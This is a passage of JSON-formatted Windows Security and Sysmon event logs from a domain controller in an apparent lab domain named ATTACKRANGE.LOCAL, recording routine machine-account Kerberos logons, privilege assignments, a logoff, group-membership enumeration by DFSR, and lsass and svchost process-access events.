Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x63cf5","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54917","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220432,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63D2E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x63d2e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220433,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x63D2E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54918\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x63d2e","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54918","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220434,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63E8C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x63e8c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220435,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x63E8C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54919\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x63e8c","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54919","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220436,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x63E8C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x63e8c","LogonType":"3","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220437,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xaf4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\dfsrs.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0xaf4","CallerProcessName":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:59.466\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:59.466","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220438,"ProcessID":864,"ThreadID":912,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-551\r\n\tGroup Name:\t\tBackup Operators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xaf4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\dfsrs.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Backup Operators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-551","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0xaf4","CallerProcessName":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:59.466\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 912\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:59.466","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"912","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:59","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:59.482\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nSourceProcessId: 1224\r\nSourceThreadId: 2220\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:59.482","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","SourceProcessId":"1224","SourceThreadId":"2220","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:52:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
